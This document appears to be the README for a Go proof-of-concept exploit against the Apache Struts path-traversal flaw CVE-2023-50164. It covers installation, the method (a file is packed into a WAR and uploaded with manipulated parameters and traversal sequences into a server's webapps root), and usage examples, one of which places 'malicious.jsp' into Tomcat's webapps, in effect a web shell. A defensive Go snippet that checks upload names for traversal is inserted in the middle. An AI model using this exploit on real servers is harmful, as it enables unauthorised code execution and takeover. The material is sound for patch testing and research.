Proof of Concept for Path Traversal in Apache Struts ("CVE-2023-50164")

PoC for CVE-2023-50164
===

Install

  To install this tool you must have Go 1.20 or later installed and configured.

  $ go install github.com/dwisiswant0/cve-2023-50164-poc@latest

  Alternatively, you can build it yourself:

  $ git clone http://github.com/dwisiswant0/cve-2023-50164-poc cve-2023-50164-poc/
  $ cd $_
  $ go build .

How it Works

  This tool operates through a series of stages to execute the exploit.
  For instance, if you want to upload the file `/path/to/file-you-want-to-upload.txt`, the tool proceeds as follows:

  1. It compresses the specified file into a WAR file, generating a `file-you-want-to-upload.war` in the
     OS-specific temporary directory. Thus, the tool assumes that the servlet context file path is
     `/file-you-want-to-upload/file-you-want-to-upload.txt`.

  2. It checks whether the servlet context file path already exists. If it does, the tool immediately returns an
     error.

  3. The tool attempts to upload the WAR file by manipulating file upload parameters.

  4. Subsequently, it double-checks the availability (status code 200) of the servlet context file path,
     indicating successful file upload.
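  The same upload primitive, seen from the server side: the following is an added Go example (the project's language), not part of the PoC, that checks whether a client-supplied file name would resolve outside a hypothetical upload directory (`/opt/tomcat/uploads`) and reduces it to a safe basename. It handles both the `/` and the `\` separator the tool can emit.

```go
package main

import (
	"fmt"
	"path"
	"strings"
)

// escapesBase reports whether saving an upload named name under base would
// land outside base, e.g. "../webapps/x.war" under "/opt/tomcat/uploads".
// Windows separators are folded into "/" first. This is a pure string check;
// it does not follow symlinks on the filesystem.
func escapesBase(base, name string) bool {
	root := path.Clean(base)
	target := path.Clean(root + "/" + strings.ReplaceAll(name, `\`, "/"))
	return target != root && !strings.HasPrefix(target, root+"/")
}

// safeName reduces a client-supplied file name to its last path element and
// rejects any name carrying a ".." segment, an empty name, or a bare separator.
func safeName(name string) (string, bool) {
	n := strings.ReplaceAll(name, `\`, "/")
	for _, seg := range strings.Split(n, "/") {
		if seg == ".." {
			return "", false
		}
	}
	b := path.Base(n)
	if b == "/" || b == "." || b == "" {
		return "", false
	}
	return b, true
}

func main() {
	// Constructed sample file names as a server might receive them in a
	// multipart upload; "/opt/tomcat/uploads" is a hypothetical upload dir.
	base := "/opt/tomcat/uploads"
	samples := []string{"foo.txt", "../webapps/foo.war", `..\..\webapps\foo.war`, "/../webapps/foo.war"}
	for _, n := range samples {
		clean, ok := safeName(n)
		fmt.Printf("%-26q escapes=%-5v safeName=%q ok=%v\n", n, escapesBase(base, n), clean, ok)
	}
}
```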

Usage

    $ cve-2023-50164-poc -h

      PoC for CVE-2023-50164
      --
      coded by @dwisiswant0

    Usage:
      cve-2023-50164-poc -u <URL> -f <FILE> -p <PATH>

    Options:
      -u, --url <URL>             Specify the upload endpoint URL
      -f, --file <FILE>           Provide the payload file for uploading
      -t, --traverse-seq <N>      Generate traversal sequences N times (default: "0")
      -p, --path <PATH>           Specify the path to the accessible root directory
      -w, -win, --windows         Converts slash ("/") chars to Windows separator ("\")

    Example:
      cve-2023-50164-poc -u http://host/path/to/upload.action -f foo.txt -t 1 -p webapps
      cve-2023-50164-poc -u http://host/upload/upload.action -f malicious.jsp -t 2 -p /opt/tomcat/webapps

Notes

  1. `jar` bin should be present in your system's $PATH.
  
  2. The target path should be an accessible root path, such as `/var/lib/jetty/webapps` for Jetty or
     `/opt/tomcat/webapps` for Apache Tomcat.
  
  3. The default number of traversal sequences is zero ("0"); you can also enter traversal sequences manually
     in the `-p`/`--path` flag value, e.g. `/../webapps` or `/../../opt/tomcat/webapps`. The traversal sequences
     will differ for each servlet.

  4. The `-w`/`-win`/`--windows` flag is only needed when the servlet runs on a Windows server.

Disclaimer

  Using this tool to attack targets without mutual consent is illegal. Users must follow local, state, and
  federal laws. The developer ("dwisiswant0"/"Dwi Siswanto") is NOT responsible for any damage caused by
  misuse of the tool.

License

  This tool is licensed under WTFPL v2 (DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE). See COPYING.